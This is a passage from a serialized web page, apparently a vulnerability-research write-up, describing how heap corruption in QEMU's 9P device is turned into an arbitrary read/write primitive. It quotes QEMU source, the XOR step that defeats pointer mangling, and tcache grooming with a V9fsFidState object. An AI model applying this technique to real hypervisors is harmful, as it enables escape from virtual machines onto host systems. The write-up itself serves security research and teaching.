becomes:",{"type":28,"tag":234,"props":129018,"children":129019},{"code":128891},[129020],{"type":28,"tag":98,"props":129021,"children":129022},{"__ignoreMap":7},[129023],{"type":33,"value":128891},{"type":28,"tag":29,"props":129025,"children":129026},{},[129027,129029,129035,129037,129042,129044,129049,129051,129056],{"type":33,"value":129028},"Since we already know ",{"type":28,"tag":98,"props":129030,"children":129032},{"className":129031},[],[129033],{"type":33,"value":129034},"curr >> 12",{"type":33,"value":129036}," from the first leak, we can read the new ",{"type":28,"tag":98,"props":129038,"children":129040},{"className":129039},[],[129041],{"type":33,"value":128886},{"type":33,"value":129043}," value from ",{"type":28,"tag":98,"props":129045,"children":129047},{"className":129046},[],[129048],{"type":33,"value":128958},{"type":33,"value":129050}," and recover the exact address of ",{"type":28,"tag":98,"props":129052,"children":129054},{"className":129053},[],[129055],{"type":33,"value":57184},{"type":33,"value":129057}," by reversing the XOR:",{"type":28,"tag":234,"props":129059,"children":129061},{"code":129060},"next = fd ^ (curr >> 12)\n",[129062],{"type":28,"tag":98,"props":129063,"children":129064},{"__ignoreMap":7},[129065],{"type":33,"value":129060},{"type":28,"tag":29,"props":129067,"children":129068},{},[129069],{"type":33,"value":129070},"This gives us the exact address of a heap chunk whose contents we control.",{"type":28,"tag":75,"props":129072,"children":129074},{"id":129073},"arbitrary-read-and-write",[129075],{"type":33,"value":129076},"Arbitrary Read and Write",{"type":28,"tag":29,"props":129078,"children":129079},{},[129080,129082,129087],{"type":33,"value":129081},"Having a controlled chunk at a known address lets us repurpose ",{"type":28,"tag":98,"props":129083,"children":129085},{"className":129084},[],[129086],{"type":33,"value":128958},{"type":33,"value":129088}," into an arbitrary read/write primitive. To do that, we go back to the 9P device.",{"type":28,"tag":29,"props":129090,"children":129091},{},[129092,129094,129099],{"type":33,"value":129093},"Recall ",{"type":28,"tag":98,"props":129095,"children":129097},{"className":129096},[],[129098],{"type":33,"value":127562},{"type":33,"value":4160},{"type":28,"tag":234,"props":129101,"children":129103},{"code":129102,"language":1797,"meta":7,"className":16176,"style":7},"static void coroutine_fn v9fs_xattrcreate(void *opaque)\n{\n    uint64_t size;\n    V9fsFidState *file_fidp;\n    V9fsFidState *xattr_fidp;\n\n    [...]\n\n    file_fidp = get_fid(pdu, fid);\n\n    [...]\n\n    /* Make the file fid point to xattr */\n    xattr_fidp = file_fidp;\n    xattr_fidp->fs.xattr.len = size;\n    xattr_fidp->fs.xattr.value = g_malloc0(size);\n\n    [...]\n",[129104],{"type":28,"tag":98,"props":129105,"children":129106},{"__ignoreMap":7},[129107,129146,129153,129164,129179,129194,129201,129208,129215,129237,129244,129251,129258,129266,129283,129322,129365,129372],{"type":28,"tag":116,"props":129108,"children":129109},{"class":245,"line":246},[129110,129114,129118,129122,129126,129130,129134,129138,129142],{"type":28,"tag":116,"props":129111,"children":129112},{"style":376},[129113],{"type":33,"value":50664},{"type":28,"tag":116,"props":129115,"children":129116},{"style":376},[129117],{"type":33,"value":2169},{"type":28,"tag":116,"props":129119,"children":129120},{"style":266},[129121],{"type":33,"value":127557},{"type":28,"tag":116,"props":129123,"children":129124},{"style":282},[129125],{"type":33,"value":127562},{"type":28,"tag":116,"props":129127,"children":129128},{"style":266},[129129],{"type":33,"value":313},{"type":28,"tag":116,"props":129131,"children":129132},{"style":376},[129133],{"type":33,"value":51245},{"type":28,"tag":116,"props":129135,"children":129136},{"style":370},[129137],{"type":33,"value":9484},{"type":28,"tag":116,"props":129139,"children":129140},{"style":272},[129141],{"type":33,"value":127579},{"type":28,"tag":116,"props":129143,"children":129144},{"style":266},[129145],{"type":33,"value":2830},{"type":28,"tag":116,"props":129147,"children":129148},{"class":245,"line":256},[129149],{"type":28,"tag":116,"props":129150,"children":129151},{"style":266},[129152],{"type":33,"value":10547},{"type":28,"tag":116,"props":129154,"children":129155},{"class":245,"line":293},[129156,129160],{"type":28,"tag":116,"props":129157,"children":129158},{"style":376},[129159],{"type":33,"value":55231},{"type":28,"tag":116,"props":129161,"children":129162},{"style":266},[129163],{"type":33,"value":124215},{"type":28,"tag":116,"props":129165,"children":129166},{"class":245,"line":361},[129167,129171,129175],{"type":28,"tag":116,"props":129168,"children":129169},{"style":266},[129170],{"type":33,"value":127704},{"type":28,"tag":116,"props":129172,"children":129173},{"style":370},[129174],{"type":33,"value":4240},{"type":28,"tag":116,"props":129176,"children":129177},{"style":266},[129178],{"type":33,"value":127713},{"type":28,"tag":116,"props":129180,"children":129181},{"class":245,"line":387},[129182,129186,129190],{"type":28,"tag":116,"props":129183,"children":129184},{"style":266},[129185],{"type":33,"value":127704},{"type":28,"tag":116,"props":129187,"children":129188},{"style":370},[129189],{"type":33,"value":4240},{"type":28,"tag":116,"props":129191,"children":129192},{"style":266},[129193],{"type":33,"value":127729},{"type":28,"tag":116,"props":129195,"children":129196},{"class":245,"line":400},[129197],{"type":28,"tag":116,"props":129198,"children":129199},{"emptyLinePlaceholder":19},[129200],{"type":33,"value":1044},{"type":28,"tag":116,"props":129202,"children":129203},{"class":245,"line":614},[129204],{"type":28,"tag":116,"props":129205,"children":129206},{"style":266},[129207],{"type":33,"value":104414},{"type":28,"tag":116,"props":129209,"children":129210},{"class":245,"line":631},[129211],{"type":28,"tag":116,"props":129212,"children":129213},{"emptyLinePlaceholder":19},[129214],{"type":33,"value":1044},{"type":28,"tag":116,"props":129216,"children":129217},{"class":245,"line":665},[129218,129223,129227,129232],{"type":28,"tag":116,"props":129219,"children":129220},{"style":266},[129221],{"type":33,"value":129222},"    file_fidp ",{"type":28,"tag":116,"props":129224,"children":129225},{"style":370},[129226],{"type":33,"value":373},{"type":28,"tag":116,"props":129228,"children":129229},{"style":282},[129230],{"type":33,"value":129231}," get_fid",{"type":28,"tag":116,"props":129233,"children":129234},{"style":266},[129235],{"type":33,"value":129236},"(pdu, fid);\n",{"type":28,"tag":116,"props":129238,"children":129239},{"class":245,"line":713},[129240],{"type":28,"tag":116,"props":129241,"children":129242},{"emptyLinePlaceholder":19},[129243],{"type":33,"value":1044},{"type":28,"tag":116,"props":129245,"children":129246},{"class":245,"line":750},[129247],{"type":28,"tag":116,"props":129248,"children":129249},{"style":266},[129250],{"type":33,"value":104414},{"type":28,"tag":116,"props":129252,"children":129253},{"class":245,"line":779},[129254],{"type":28,"tag":116,"props":129255,"children":129256},{"emptyLinePlaceholder":19},[129257],{"type":33,"value":1044},{"type":28,"tag":116,"props":129259,"children":129260},{"class":245,"line":796},[129261],{"type":28,"tag":116,"props":129262,"children":129263},{"style":250},[129264],{"type":33,"value":129265},"    /* Make the file fid point to xattr */\n",{"type":28,"tag":116,"props":129267,"children":129268},{"class":245,"line":847},[129269,129274,129278],{"type":28,"tag":116,"props":129270,"children":129271},{"style":266},[129272],{"type":33,"value":129273},"    xattr_fidp ",{"type":28,"tag":116,"props":129275,"children":129276},{"style":370},[129277],{"type":33,"value":373},{"type":28,"tag":116,"props":129279,"children":129280},{"style":266},[129281],{"type":33,"value":129282}," file_fidp;\n",{"type":28,"tag":116,"props":129284,"children":129285},{"class":245,"line":898},[129286,129290,129294,129298,129302,129306,129310,129314,129318],{"type":28,"tag":116,"props":129287,"children":129288},{"style":272},[129289],{"type":33,"value":128107},{"type":28,"tag":116,"props":129291,"children":129292},{"style":266},[129293],{"type":33,"value":13423},{"type":28,"tag":116,"props":129295,"children":129296},{"style":272},[129297],{"type":33,"value":36606},{"type":28,"tag":116,"props":129299,"children":129300},{"style":266},[129301],{"type":33,"value":141},{"type":28,"tag":116,"props":129303,"children":129304},{"style":272},[129305],{"type":33,"value":128031},{"type":28,"tag":116,"props":129307,"children":129308},{"style":266},[129309],{"type":33,"value":141},{"type":28,"tag":116,"props":129311,"children":129312},{"style":272},[129313],{"type":33,"value":8807},{"type":28,"tag":116,"props":129315,"children":129316},{"style":370},[129317],{"type":33,"value":2226},{"type":28,"tag":116,"props":129319,"children":129320},{"style":266},[129321],{"type":33,"value":124215},{"type":28,"tag":116,"props":129323,"children":129324},{"class":245,"line":907},[129325,129329,129333,129337,129341,129345,129349,129353,129357,129361],{"type":28,"tag":116,"props":129326,"children":129327},{"style":272},[129328],{"type":33,"value":128107},{"type":28,"tag":116,"props":129330,"children":129331},{"style":266},[129332],{"type":33,"value":13423},{"type":28,"tag":116,"props":129334,"children":129335},{"style":272},[129336],{"type":33,"value":36606},{"type":28,"tag":116,"props":129338,"children":129339},{"style":266},[129340],{"type":33,"value":141},{"type":28,"tag":116,"props":129342,"children":129343},{"style":272},[129344],{"type":33,"value":128031},{"type":28,"tag":116,"props":129346,"children":129347},{"style":266},[129348],{"type":33,"value":141},{"type":28,"tag":116,"props":129350,"children":129351},{"style":272},[129352],{"type":33,"value":38773},{"type":28,"tag":116,"props":129354,"children":129355},{"style":370},[129356],{"type":33,"value":2226},{"type":28,"tag":116,"props":129358,"children":129359},{"style":282},[129360],{"type":33,"value":123786},{"type":28,"tag":116,"props":129362,"children":129363},{"style":266},[129364],{"type":33,"value":128144},{"type":28,"tag":116,"props":129366,"children":129367},{"class":245,"line":981},[129368],{"type":28,"tag":116,"props":129369,"children":129370},{"emptyLinePlaceholder":19},[129371],{"type":33,"value":1044},{"type":28,"tag":116,"props":129373,"children":129374},{"class":245,"line":1011},[129375],{"type":28,"tag":116,"props":129376,"children":129377},{"style":266},[129378],{"type":33,"value":104414},{"type":28,"tag":29,"props":129380,"children":129381},{},[129382,129384,129390,129392,129397,129398,129403,129405,129410,129412,129418,129419,129425,129427,129432,129433,129438],{"type":33,"value":129383},"The important detail here is that an xattr FID stores both the backing pointer and its length inside the surrounding ",{"type":28,"tag":98,"props":129385,"children":129387},{"className":129386},[],[129388],{"type":33,"value":129389},"V9fsFidState",{"type":33,"value":129391}," object. In other words, if we can place a ",{"type":28,"tag":98,"props":129393,"children":129395},{"className":129394},[],[129396],{"type":33,"value":129389},{"type":33,"value":6993},{"type":28,"tag":98,"props":129399,"children":129401},{"className":129400},[],[129402],{"type":33,"value":128958},{"type":33,"value":129404}," currently sits, the overlapping ",{"type":28,"tag":98,"props":129406,"children":129408},{"className":129407},[],[129409],{"type":33,"value":128966},{"type":33,"value":129411}," chunk can overwrite ",{"type":28,"tag":98,"props":129413,"children":129415},{"className":129414},[],[129416],{"type":33,"value":129417},"V9fsFidState.fs.xattr.value",{"type":33,"value":10659},{"type":28,"tag":98,"props":129420,"children":129422},{"className":129421},[],[129423],{"type":33,"value":129424},"V9fsFidState.fs.xattr.len",{"type":33,"value":129426},". That would immediately give us arbitrary read and write through ",{"type":28,"tag":98,"props":129428,"children":129430},{"className":129429},[],[129431],{"type":33,"value":128220},{"type":33,"value":10659},{"type":28,"tag":98,"props":129434,"children":129436},{"className":129435},[],[129437],{"type":33,"value":128212},{"type":33,"value":141},{"type":28,"tag":29,"props":129440,"children":129441},{},[129442,129444,129449,129450,129455,129457,129462,129464,129470,129472,129477,129479,129484,129486,129491,129493,129498,129500,129505],{"type":33,"value":129443},"At this point, ",{"type":28,"tag":98,"props":129445,"children":129447},{"className":129446},[],[129448],{"type":33,"value":128958},{"type":33,"value":15106},{"type":28,"tag":98,"props":129451,"children":129453},{"className":129452},[],[129454],{"type":33,"value":127427},{"type":33,"value":129456}," chunk, while ",{"type":28,"tag":98,"props":129458,"children":129460},{"className":129459},[],[129461],{"type":33,"value":129389},{"type":33,"value":129463}," falls into the ",{"type":28,"tag":98,"props":129465,"children":129467},{"className":129466},[],[129468],{"type":33,"value":129469},"0x120",{"type":33,"value":129471}," size class. Before freeing ",{"type":28,"tag":98,"props":129473,"children":129475},{"className":129474},[],[129476],{"type":33,"value":128958},{"type":33,"value":129478},", we therefore use the oversized ",{"type":28,"tag":98,"props":129480,"children":129482},{"className":129481},[],[129483],{"type":33,"value":128966},{"type":33,"value":129485}," chunk to change its size to match ",{"type":28,"tag":98,"props":129487,"children":129489},{"className":129488},[],[129490],{"type":33,"value":129389},{"type":33,"value":129492},". Once ",{"type":28,"tag":98,"props":129494,"children":129496},{"className":129495},[],[129497],{"type":33,"value":128958},{"type":33,"value":129499}," is freed, it is inserted into the ",{"type":28,"tag":98,"props":129501,"children":129503},{"className":129502},[],[129504],{"type":33,"value":129469},{"type":33,"value":129506}," tcache bin.",{"type":28,"tag":234,"props":129508,"children":129510},{"code":129509},"             .value Y extended\n                     |\n+--------------------+--------------------+\n|                                         |\n|                          Free           |\nv                          0x120          v\n+--------------------+---------------+----+\n|                    |...............|    |\n|      .value Y      |...............|    |\n|                    |...............|    |\n+--------------------+---------------+----+\n",[129511],{"type":28,"tag":98,"props":129512,"children":129513},{"__ignoreMap":7},[129514],{"type":33,"value":129509},{"type":28,"tag":29,"props":129516,"children":129517},{},[129518,129520,129525,129527,129533,129535,129541,129543,129548],{"type":33,"value":129519},"After that, we can simply allocate a new ",{"type":28,"tag":98,"props":129521,"children":129523},{"className":129522},[],[129524],{"type":33,"value":129389},{"type":33,"value":129526}," with a ",{"type":28,"tag":98,"props":129528,"children":129530},{"className":129529},[],[129531],{"type":33,"value":129532},"P9_TWALK",{"type":33,"value":129534}," request and a fresh FID - this reaches ",{"type":28,"tag":98,"props":129536,"children":129538},{"className":129537},[],[129539],{"type":33,"value":129540},"alloc_fid",{"type":33,"value":129542},", which allocates a new ",{"type":28,"tag":98,"props":129544,"children":129546},{"className":129545},[],[129547],{"type":33,"value":129389},{"type":33,"value":4160},{"type":28,"tag":234,"props":129550,"children":129552},{"code":129551,"language":1797,"meta":7,"className":16176,"style":7},"static void coroutine_fn v9fs_walk(void *opaque)\n{\n    V9fsFidState *fidp;\n    V9fsFidState *newfidp = NULL;\n\n    [...]\n\n    if (fid == newfid) {\n        [...]\n    } else {\n        newfidp = alloc_fid(s, newfid);\n        if (newfidp == NULL) {\n            err = -EINVAL;\n            goto out;\n        }\n        newfidp->uid = fidp->uid;\n        v9fs_path_copy(&newfidp->path, &path);\n    }\n\n    [...]\n}\n\nstatic V9fsFidState *alloc_fid(V9fsState *s, int32_t fid)\n{\n    V9fsFidState *f;\n\n    f = g_hash_table_lookup(s->fids, GINT_TO_POINTER(fid));\n    if (f) {\n        /* If fid is already there return NULL */\n        BUG_ON(f->clunked);\n        return NULL;\n    }\n    f = g_new0(V9fsFidState, 1);\n\n    [...]\n",[129553],{"type":28,"tag":98,"props":129554,"children":129555},{"__ignoreMap":7},[129556,129596,129603,129619,129647,129654,129661,129668,129689,129696,129711,129733,129757,129778,129789,129796,129834,129876,129883,129890,129897,129904,129911,129962,129969,129984,129991,130039,130051,130059,130088,130103,130110,130139,130146],{"type":28,"tag":116,"props":129557,"children":129558},{"class":245,"line":246},[129559,129563,129567,129571,129576,129580,129584,129588,129592],{"type":28,"tag":116,"props":129560,"children":129561},{"style":376},[129562],{"type":33,"value":50664},{"type":28,"tag":116,"props":129564,"children":129565},{"style":376},[129566],{"type":33,"value":2169},{"type":28,"tag":116,"props":129568,"children":129569},{"style":266},[129570],{"type":33,"value":127557},{"type":28,"tag":116,"props":129572,"children":129573},{"style":282},[129574],{"type":33,"value":129575},"v9fs_walk",{"type":28,"tag":116,"props":129577,"children":129578},{"style":266},[129579],{"type":33,"value":313},{"type":28,"tag":116,"props":129581,"children":129582},{"style":376},[129583],{"type":33,"value":51245},{"type":28,"tag":116,"props":129585,"children":129586},{"style":370},[129587],{"type":33,"value":9484},{"type":28,"tag":116,"props":129589,"children":129590},{"style":272},[129591],{"type":33,"value":127579},{"type":28,"tag":116,"props":129593,"children":129594},{"style":266},[129595],{"type":33,"value":2830},{"type":28,"tag":116,"props":129597,"children":129598},{"class":245,"line":256},[129599],{"type":28,"tag":116,"props":129600,"children":129601},{"style":266},[129602],{"type":33,"value":10547},{"type":28,"tag":116,"props":129604,"children":129605},{"class":245,"line":293},[129606,129610,129614],{"type":28,"tag":116,"props":129607,"children":129608},{"style":266},[129609],{"type":33,"value":127704},{"type":28,"tag":116,"props":129611,"children":129612},{"style":370},[129613],{"type":33,"value":4240},{"type":28,"tag":116,"props":129615,"children":129616},{"style":266},[129617],{"type":33,"value":129618},"fidp;\n",{"type":28,"tag":116,"props":129620,"children":129621},{"class":245,"line":361},[129622,129626,129630,129635,129639,129643],{"type":28,"tag":116,"props":129623,"children":129624},{"style":266},[129625],{"type":33,"value":127704},{"type":28,"tag":116,"props":129627,"children":129628},{"style":370},[129629],{"type":33,"value":4240},{"type":28,"tag":116,"props":129631,"children":129632},{"style":266},[129633],{"type":33,"value":129634},"newfidp ",{"type":28,"tag":116,"props":129636,"children":129637},{"style":370},[129638],{"type":33,"value":373},{"type":28,"tag":116,"props":129640,"children":129641},{"style":376},[129642],{"type":33,"value":127383},{"type":28,"tag":116,"props":129644,"children":129645},{"style":266},[129646],{"type":33,"value":384},{"type":28,"tag":116,"props":129648,"children":129649},{"class":245,"line":387},[129650],{"type":28,"tag":116,"props":129651,"children":129652},{"emptyLinePlaceholder":19},[129653],{"type":33,"value":1044},{"type":28,"tag":116,"props":129655,"children":129656},{"class":245,"line":400},[129657],{"type":28,"tag":116,"props":129658,"children":129659},{"style":266},[129660],{"type":33,"value":104414},{"type":28,"tag":116,"props":129662,"children":129663},{"class":245,"line":614},[129664],{"type":28,"tag":116,"props":129665,"children":129666},{"emptyLinePlaceholder":19},[129667],{"type":33,"value":1044},{"type":28,"tag":116,"props":129669,"children":129670},{"class":245,"line":631},[129671,129675,129680,129684],{"type":28,"tag":116,"props":129672,"children":129673},{"style":260},[129674],{"type":33,"value":11947},{"type":28,"tag":116,"props":129676,"children":129677},{"style":266},[129678],{"type":33,"value":129679}," (fid ",{"type":28,"tag":116,"props":129681,"children":129682},{"style":370},[129683],{"type":33,"value":2340},{"type":28,"tag":116,"props":129685,"children":129686},{"style":266},[129687],{"type":33,"value":129688}," newfid) {\n",{"type":28,"tag":116,"props":129690,"children":129691},{"class":245,"line":665},[129692],{"type":28,"tag":116,"props":129693,"children":129694},{"style":266},[129695],{"type":33,"value":123652},{"type":28,"tag":116,"props":129697,"children":129698},{"class":245,"line":713},[129699,129703,129707],{"type":28,"tag":116,"props":129700,"children":129701},{"style":266},[129702],{"type":33,"value":15440},{"type":28,"tag":116,"props":129704,"children":129705},{"style":260},[129706],{"type":33,"value":2986},{"type":28,"tag":116,"props":129708,"children":129709},{"style":266},[129710],{"type":33,"value":1291},{"type":28,"tag":116,"props":129712,"children":129713},{"class":245,"line":750},[129714,129719,129723,129728],{"type":28,"tag":116,"props":129715,"children":129716},{"style":266},[129717],{"type":33,"value":129718},"        newfidp ",{"type":28,"tag":116,"props":129720,"children":129721},{"style":370},[129722],{"type":33,"value":373},{"type":28,"tag":116,"props":129724,"children":129725},{"style":282},[129726],{"type":33,"value":129727}," alloc_fid",{"type":28,"tag":116,"props":129729,"children":129730},{"style":266},[129731],{"type":33,"value":129732},"(s, newfid);\n",{"type":28,"tag":116,"props":129734,"children":129735},{"class":245,"line":779},[129736,129740,129745,129749,129753],{"type":28,"tag":116,"props":129737,"children":129738},{"style":260},[129739],{"type":33,"value":2943},{"type":28,"tag":116,"props":129741,"children":129742},{"style":266},[129743],{"type":33,"value":129744}," (newfidp ",{"type":28,"tag":116,"props":129746,"children":129747},{"style":370},[129748],{"type":33,"value":2340},{"type":28,"tag":116,"props":129750,"children":129751},{"style":376},[129752],{"type":33,"value":127383},{"type":28,"tag":116,"props":129754,"children":129755},{"style":266},[129756],{"type":33,"value":844},{"type":28,"tag":116,"props":129758,"children":129759},{"class":245,"line":796},[129760,129765,129769,129773],{"type":28,"tag":116,"props":129761,"children":129762},{"style":266},[129763],{"type":33,"value":129764},"            err ",{"type":28,"tag":116,"props":129766,"children":129767},{"style":370},[129768],{"type":33,"value":373},{"type":28,"tag":116,"props":129770,"children":129771},{"style":370},[129772],{"type":33,"value":50874},{"type":28,"tag":116,"props":129774,"children":129775},{"style":266},[129776],{"type":33,"value":129777},"EINVAL;\n",{"type":28,"tag":116,"props":129779,"children":129780},{"class":245,"line":847},[129781,129785],{"type":28,"tag":116,"props":129782,"children":129783},{"style":260},[129784],{"type":33,"value":60168},{"type":28,"tag":116,"props":129786,"children":129787},{"style":266},[129788],{"type":33,"value":60173},{"type":28,"tag":116,"props":129790,"children":129791},{"class":245,"line":898},[129792],{"type":28,"tag":116,"props":129793,"children":129794},{"style":266},[129795],{"type":33,"value":1954},{"type":28,"tag":116,"props":129797,"children":129798},{"class":245,"line":907},[129799,129804,129808,129813,129817,129822,129826,129830],{"type":28,"tag":116,"props":129800,"children":129801},{"style":272},[129802],{"type":33,"value":129803},"        newfidp",{"type":28,"tag":116,"props":129805,"children":129806},{"style":266},[129807],{"type":33,"value":13423},{"type":28,"tag":116,"props":129809,"children":129810},{"style":272},[129811],{"type":33,"value":129812},"uid",{"type":28,"tag":116,"props":129814,"children":129815},{"style":370},[129816],{"type":33,"value":2226},{"type":28,"tag":116,"props":129818,"children":129819},{"style":272},[129820],{"type":33,"value":129821}," fidp",{"type":28,"tag":116,"props":129823,"children":129824},{"style":266},[129825],{"type":33,"value":13423},{"type":28,"tag":116,"props":129827,"children":129828},{"style":272},[129829],{"type":33,"value":129812},{"type":28,"tag":116,"props":129831,"children":129832},{"style":266},[129833],{"type":33,"value":384},{"type":28,"tag":116,"props":129835,"children":129836},{"class":245,"line":981},[129837,129842,129846,129850,129855,129859,129863,129867,129871],{"type":28,"tag":116,"props":129838,"children":129839},{"style":282},[129840],{"type":33,"value":129841},"        v9fs_path_copy",{"type":28,"tag":116,"props":129843,"children":129844},{"style":266},[129845],{"type":33,"value":313},{"type":28,"tag":116,"props":129847,"children":129848},{"style":370},[129849],{"type":33,"value":2780},{"type":28,"tag":116,"props":129851,"children":129852},{"style":272},[129853],{"type":33,"value":129854},"newfidp",{"type":28,"tag":116,"props":129856,"children":129857},{"style":266},[129858],{"type":33,"value":13423},{"type":28,"tag":116,"props":129860,"children":129861},{"style":272},[129862],{"type":33,"value":111937},{"type":28,"tag":116,"props":129864,"children":129865},{"style":266},[129866],{"type":33,"value":825},{"type":28,"tag":116,"props":129868,"children":129869},{"style":370},[129870],{"type":33,"value":2780},{"type":28,"tag":116,"props":129872,"children":129873},{"style":266},[129874],{"type":33,"value":129875},"path);\n",{"type":28,"tag":116,"props":129877,"children":129878},{"class":245,"line":1011},[129879],{"type":28,"tag":116,"props":129880,"children":129881},{"style":266},[129882],{"type":33,"value":3025},{"type":28,"tag":116,"props":129884,"children":129885},{"class":245,"line":1029},[129886],{"type":28,"tag":116,"props":129887,"children":129888},{"emptyLinePlaceholder":19},[129889],{"type":33,"value":1044},{"type":28,"tag":116,"props":129891,"children":129892},{"class":245,"line":1038},[129893],{"type":28,"tag":116,"props":129894,"children":129895},{"style":266},[129896],{"type":33,"value":104414},{"type":28,"tag":116,"props":129898,"children":129899},{"class":245,"line":1047},[129900],{"type":28,"tag":116,"props":129901,"children":129902},{"style":266},[129903],{"type":33,"value":406},{"type":28,"tag":116,"props":129905,"children":129906},{"class":245,"line":1071},[129907],{"type":28,"tag":116,"props":129908,"children":129909},{"emptyLinePlaceholder":19},[129910],{"type":33,"value":1044},{"type":28,"tag":116,"props":129912,"children":129913},{"class":245,"line":1137},[129914,129918,129923,129927,129931,129936,129940,129944,129948,129953,129958],{"type":28,"tag":116,"props":129915,"children":129916},{"style":376},[129917],{"type":33,"value":50664},{"type":28,"tag":116,"props":129919,"children":129920},{"style":266},[129921],{"type":33,"value":129922}," V9fsFidState ",{"type":28,"tag":116,"props":129924,"children":129925},{"style":370},[129926],{"type":33,"value":4240},{"type":28,"tag":116,"props":129928,"children":129929},{"style":282},[129930],{"type":33,"value":129540},{"type":28,"tag":116,"props":129932,"children":129933},{"style":266},[129934],{"type":33,"value":129935},"(V9fsState ",{"type":28,"tag":116,"props":129937,"children":129938},{"style":370},[129939],{"type":33,"value":4240},{"type":28,"tag":116,"props":129941,"children":129942},{"style":272},[129943],{"type":33,"value":10318},{"type":28,"tag":116,"props":129945,"children":129946},{"style":266},[129947],{"type":33,"value":825},{"type":28,"tag":116,"props":129949,"children":129950},{"style":376},[129951],{"type":33,"value":129952},"int32_t",{"type":28,"tag":116,"props":129954,"children":129955},{"style":272},[129956],{"type":33,"value":129957}," fid",{"type":28,"tag":116,"props":129959,"children":129960},{"style":266},[129961],{"type":33,"value":2830},{"type":28,"tag":116,"props":129963,"children":129964},{"class":245,"line":1181},[129965],{"type":28,"tag":116,"props":129966,"children":129967},{"style":266},[129968],{"type":33,"value":10547},{"type":28,"tag":116,"props":129970,"children":129971},{"class":245,"line":1212},[129972,129976,129980],{"type":28,"tag":116,"props":129973,"children":129974},{"style":266},[129975],{"type":33,"value":127704},{"type":28,"tag":116,"props":129977,"children":129978},{"style":370},[129979],{"type":33,"value":4240},{"type":28,"tag":116,"props":129981,"children":129982},{"style":266},[129983],{"type":33,"value":50784},{"type":28,"tag":116,"props":129985,"children":129986},{"class":245,"line":1254},[129987],{"type":28,"tag":116,"props":129988,"children":129989},{"emptyLinePlaceholder":19},[129990],{"type":33,"value":1044},{"type":28,"tag":116,"props":129992,"children":129993},{"class":245,"line":1262},[129994,129999,130003,130008,130012,130016,130020,130025,130029,130034],{"type":28,"tag":116,"props":129995,"children":129996},{"style":266},[129997],{"type":33,"value":129998},"    f ",{"type":28,"tag":116,"props":130000,"children":130001},{"style":370},[130002],{"type":33,"value":373},{"type":28,"tag":116,"props":130004,"children":130005},{"style":282},[130006],{"type":33,"value":130007}," g_hash_table_lookup",{"type":28,"tag":116,"props":130009,"children":130010},{"style":266},[130011],{"type":33,"value":313},{"type":28,"tag":116,"props":130013,"children":130014},{"style":272},[130015],{"type":33,"value":10318},{"type":28,"tag":116,"props":130017,"children":130018},{"style":266},[130019],{"type":33,"value":13423},{"type":28,"tag":116,"props":130021,"children":130022},{"style":272},[130023],{"type":33,"value":130024},"fids",{"type":28,"tag":116,"props":130026,"children":130027},{"style":266},[130028],{"type":33,"value":825},{"type":28,"tag":116,"props":130030,"children":130031},{"style":282},[130032],{"type":33,"value":130033},"GINT_TO_POINTER",{"type":28,"tag":116,"props":130035,"children":130036},{"style":266},[130037],{"type":33,"value":130038},"(fid));\n",{"type":28,"tag":116,"props":130040,"children":130041},{"class":245,"line":1294},[130042,130046],{"type":28,"tag":116,"props":130043,"children":130044},{"style":260},[130045],{"type":33,"value":11947},{"type":28,"tag":116,"props":130047,"children":130048},{"style":266},[130049],{"type":33,"value":130050}," (f) {\n",{"type":28,"tag":116,"props":130052,"children":130053},{"class":245,"line":1334},[130054],{"type":28,"tag":116,"props":130055,"children":130056},{"style":250},[130057],{"type":33,"value":130058},"        /* If fid is already there return NULL */\n",{"type":28,"tag":116,"props":130060,"children":130061},{"class":245,"line":1372},[130062,130067,130071,130075,130079,130084],{"type":28,"tag":116,"props":130063,"children":130064},{"style":282},[130065],{"type":33,"value":130066},"        BUG_ON",{"type":28,"tag":116,"props":130068,"children":130069},{"style":266},[130070],{"type":33,"value":313},{"type":28,"tag":116,"props":130072,"children":130073},{"style":272},[130074],{"type":33,"value":32719},{"type":28,"tag":116,"props":130076,"children":130077},{"style":266},[130078],{"type":33,"value":13423},{"type":28,"tag":116,"props":130080,"children":130081},{"style":272},[130082],{"type":33,"value":130083},"clunked",{"type":28,"tag":116,"props":130085,"children":130086},{"style":266},[130087],{"type":33,"value":895},{"type":28,"tag":116,"props":130089,"children":130090},{"class":245,"line":1381},[130091,130095,130099],{"type":28,"tag":116,"props":130092,"children":130093},{"style":260},[130094],{"type":33,"value":15405},{"type":28,"tag":116,"props":130096,"children":130097},{"style":376},[130098],{"type":33,"value":127383},{"type":28,"tag":116,"props":130100,"children":130101},{"style":266},[130102],{"type":33,"value":384},{"type":28,"tag":116,"props":130104,"children":130105},{"class":245,"line":1389},[130106],{"type":28,"tag":116,"props":130107,"children":130108},{"style":266},[130109],{"type":33,"value":3025},{"type":28,"tag":116,"props":130111,"children":130112},{"class":245,"line":1425},[130113,130117,130121,130126,130131,130135],{"type":28,"tag":116,"props":130114,"children":130115},{"style":266},[130116],{"type":33,"value":129998},{"type":28,"tag":116,"props":130118,"children":130119},{"style":370},[130120],{"type":33,"value":373},{"type":28,"tag":116,"props":130122,"children":130123},{"style":282},[130124],{"type":33,"value":130125}," g_new0",{"type":28,"tag":116,"props":130127,"children":130128},{"style":266},[130129],{"type":33,"value":130130},"(V9fsFidState, ",{"type":28,"tag":116,"props":130132,"children":130133},{"style":350},[130134],{"type":33,"value":1824},{"type":28,"tag":116,"props":130136,"children":130137},{"style":266},[130138],{"type":33,"value":895},{"type":28,"tag":116,"props":130140,"children":130141},{"class":245,"line":1448},[130142],{"type":28,"tag":116,"props":130143,"children":130144},{"emptyLinePlaceholder":19},[130145],{"type":33,"value":1044},{"type":28,"tag":116,"props":130147,"children":130148},{"class":245,"line":1456},[130149],{"type":28,"tag":116,"props":130150,"children":130151},{"style":266},[130152],{"type":33,"value":104414},{"type":28,"tag":29,"props":130154,"children":130155},{},[130156,130158,130163],{"type":33,"value":130157},"After it is allocated, it will be placed into that freed region in place of the old ",{"type":28,"tag":98,"props":130159,"children":130161},{"className":130160},[],[130162],{"type":33,"value":128958},{"type":33,"value":128295},{"type":28,"tag":234,"props":130165,"children":130167},{"code":130166},"             .value Y extended\n                     |\n+--------------------+--------------------+\n|                                         |\n|                                         |\nv                                         v\n+--------------------+---------------+----+\n|                    |               |....|\n|      .value Y      |  V9fsFidState |....|\n|                    |               |....|\n+--------------------+---------------+----+\n",[130168],{"type":28,"tag":98,"props":130169,"children":130170},{"__ignoreMap":7},[130171],{"type":33,"value":130166},{"type":28,"tag":443,"props":130173,"children":130175},{"id":130174},"leaking-a-qemu-address",[130176],{"type":33,"value":130177},"Leaking a QEMU Address",{"type":28,"tag":29,"props":130179,"children":130180},{},[130181],{"type":33,"value":130182},"We now have an arbitrary read/write primitive and 